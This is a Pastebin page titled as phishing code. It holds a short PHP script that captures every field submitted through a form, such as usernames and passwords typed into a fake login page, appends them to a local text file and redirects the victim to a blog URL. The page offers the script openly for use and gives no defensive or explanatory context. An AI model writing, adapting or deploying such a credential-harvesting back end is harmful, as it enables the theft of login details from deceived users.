Advertisement
Firakib

Sorryclose Phishing Code By Fibd

Mar 16th, 2017
621
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. <?php
  2. header
  3. ('location:http://fibd26.blogspot.com');
  4. $handle=fopen("usernames.txt","a");
  5. foreach($_POST as $variable=>$value)
  6. {
  7. fwrite($handle,$variable);
  8. fwrite($handle,"=");
  9. fwrite($handle,$value);
  10. fwrite($handle,"\r\n");
  11. }
  12. fwrite($handle,"\r\n");
  13. fclose($handle);
  14. exit;
  15. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement